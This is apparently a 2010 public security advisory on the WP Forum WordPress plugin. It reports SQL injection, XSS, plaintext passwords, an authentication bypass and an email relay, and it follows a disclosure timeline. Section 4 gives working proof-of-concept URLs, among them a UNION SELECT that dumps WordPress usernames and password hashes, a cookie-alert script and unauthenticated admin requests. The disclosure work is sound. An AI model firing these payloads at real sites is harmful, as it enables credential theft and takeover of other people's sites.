Multiple Vulnerabilities in WP Forum (WordPress Plugin)

1. Advisory Information

Title: Multiple Vulnerabilities in WP-Forum
Advisory URL: http://www.charleshooper.net/advisories/
Date Published: 12/17/2010
Vendors Contacted: WordPress. Maintainer of plugin is unreachable.


2. Summary

WP Forum is a plugin for the popular blog tool and publishing platform,
WordPress.
The author of WP Forum describes it as a "Simple discussion forum
plugin" and
"easy to use and administer."

There exist multiple vulnerabilities in WP Forum. Basically, input
validation is not
performed at all resulting in SQL injection, stored XSS, and reflected
XSS vulns.

Furthermore, the author wrote the plugin under the assumption that it
would only be
executed within the context of the WordPress administrative panel,
thereby neglecting
to perform proper authentication and authorization.


3. Vulnerability Information

Packages/Versions Affected: Probably all, but confirmed only on WP Forum
1.7.8

3a. Type:   SQL Injection [CWE-89]
3a. Impact: Read application data, bypass protection mechanism,
            modify application data. There are multiple SQL injections
present
            in WP Forum. The most prominent of which is the SQL
injection present
            in the `group_login` functionality. Prior to logging in, an
attacker
            can retrieve each group's passwords due to the vulnerability
listed
            below (3b).

3b. Type:   Plaintext Storage of a Password [CWE-256]
3b. Impact: Password is easily retrieved from database

3c. Type:   XSS (Stored or Reflected) [CWE-79]
3c. Impact: Execute unauthorized code or commands

3d. Type:   Auth Bypass via Direct Request [CWE-425]
3d. Impact: Many or all of the administrative functions assume they are
running
            in the context of the WordPress administrative section. As a
result,
            they often do not check that the user is authenticated or
authorized
            to perform a particular action. Example functionality
includes adding
            or removing forum moderators and deleting forums. This
vulnerability
            could lead to information exposure, privilege escalation, or
data loss.

3e. Type:   Information Exposure Through Sent Data [CWE-201]
3e. Impact: `sendmail.php` discloses users' email addresses by accepting
a user-
            provider "user" variable and returns a hidden <input/> tag
containing
            that user's email address.

3f. Type:   External Control of Assumed-Immutable Web Parameter [CWE-472]
3f. Impact: `sendmail.php` accepts user-provided input allowing it to be
used as
             an email relay


4. PoC & Technical Description

Due to the number of vulnerabilities in this package, I will not discuss
each one
individually. Instead, here are some sample POCs. Many more exploitable
vulns exist
in this package than what I am providing here.

4a.
http://path.to/wordpress/?page_id=<forum>&forumaction=group_login&group_id=0%20UNION%20SELECT%20CONCAT_WS%28CHAR%2858%29,user_login,user_pass,user_email%29%20FROM%20wp_users%20LIMIT%201%20%23
    or (goes for all POCs):
http://path.to/wordpress/<forum>?forumaction=group_login&group_id=0%20UNION%20SELECT%20CONCAT_WS%28CHAR%2858%29,user_login,user_pass,user_email%29%20FROM%20wp_users%20LIMIT%201%20%23
4b. N/A
4c.
http://path.to/wordpress/<forum>?forumaction=group_login&group_id=<script>alert(document.cookie);<%2fscript>
4d.
http://path.to/wordpress/wp-content/plugins/wpforum/wp-forum-manage.php?editgroupsubmit=true&group=<group
id>&groupname=<new group name>&passwd=<new group password>
4e.
http://path.to/wordpress/wp-content/plugins/wpforum/sendmail.php?user=<user
id> (email address will be in HTML source)
4f. POST 'submit=true&sender=<from address>&email=<to
address>&message=<body>&subject=<subject>&replyto=<replyto>
    to http://path.to/wordpress/wp-content/plugins/wpforum/sendmail.php
(untested)


5. Report Timeline

12/10/2010 Initial email sent to WordPress security.
12/10/2010 Maintainer not yet contacted as project appears abandoned and
maintainer
           does not have listed contact information.
12/17/2010 No reply from WordPress security. Advisory released.


6. References

6a. The WordPress Plugin page for WP Forum:
    http://wordpress.org/extend/plugins/wpforum/

6b. The WordPress Profile page for the author of the plugin:
    http://profiles.wordpress.org/users/fahlstad/

6c. The plugin author's website:
    http://www.fahlstad.se/


7. Legalese

This vulnerability report by Charles Hooper < chooper@plumata.com > is
licensed under a Creative Commons Attribution-NonCommercial-ShareAlike
3.0 Unported License.


8. Signature

Public Key: Obtainable via pool.sks-keyservers.net